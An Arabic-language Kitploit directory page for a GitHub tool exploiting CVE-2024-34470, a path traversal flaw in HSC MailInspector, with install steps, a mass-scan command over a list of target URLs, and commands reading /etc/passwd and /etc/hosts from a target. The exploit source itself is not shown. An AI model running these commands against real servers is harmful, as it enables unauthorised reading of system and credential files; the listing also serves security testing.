Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-34470 — تم العثور على ثغرة أمنية خطيرة في HSC Mailinspector حتى الإصدار 5.2.18. تؤثر هذه الثغرة على وظيفة غير معروفة في الملف /public/loader.php. | Kitploit
أدوات/GitHubGitHub/mr-r00t11/cve-2024-34470
الاستطلاعتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراق
GitHubmr-r00t11/cve-2024-34470

CVE-2024-34470

تم العثور على ثغرة أمنية خطيرة في HSC Mailinspector حتى الإصدار 5.2.18. تؤثر هذه الثغرة على وظيفة غير معروفة في الملف /public/loader.php.

عرض المستودع
5منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

HSC MailInspector - CVE-2024-34470


تم العثور على ثغرة أمنية خطيرة في HSC Mailinspector حتى الإصدار 5.2.18. تؤثر هذه الثغرة على وظيفة غير معروفة في الملف /public/loader.php. يؤدي التلاعب بالوسيطة 'path' بإدخال غير معروف إلى ثغرة اجتياز المسار. وفقًا لـ CWE، تم تصنيف هذه المشكلة على أنها CWE-22. يستخدم المنتج مدخلات خارجية لبناء اسم مسار يهدف إلى تحديد ملف أو دليل يقع تحت دليل رئيسي مقيد، لكن المنتج لا يعمل على تحييد العناصر الخاصة بشكل صحيح داخل اسم المسار والتي قد تؤدي إلى حل اسم المسار إلى موقع خارج الدليل المقيد. يؤثر هذا على السرية والنزاهة والتوفر.


التثبيت

استنساخ المستودع:

root@kitploit:~
git clone https://CVE-2024-34470.git
cd CVE-2024-34470

تثبيت التبعيات

تأكد من تثبيت Python و pip. ثم قم بتشغيل:

root@kitploit:~
pip install -r requirements.txt
  • سيؤدي هذا إلى تثبيت جميع التبعيات الضرورية لتشغيل البرنامج النصي.

الاستخدام

وصف البرنامج النصي

للبحث عن أهداف متعددة باستخدام ملف نصي، استخدم البرنامج النصي Massive_CVE-2024-34470.py

root@kitploit:~
$ python3 Massive_CVE-2024-34470.py urls.txt urls_vulnerable.txt 2>/dev/null

يجب أن يكون التنسيق الذي يكون به ملف urls.txt كما يلي:

root@kitploit:~
https://10.18.97.2
http://domain.com
https://192.8.7.2:4443

[Screenshot_1.png]


بمجرد تحديد الأهداف المعرضة للخطر، نستخدم البرنامج النصي المسمى CVE-2024-34470.py لاستغلال وعرض المحتوى المحدد عبر الطرفية.

root@kitploit:~
# Read file content passwd
$ python CVE-2024-34470.py http://example.com /etc/passwd 2>/dev/null

# Read file content hosts
$ python CVE-2024-34470.py http://example.com /etc/hosts

[screenshot_2.png]

تنزيل الأداة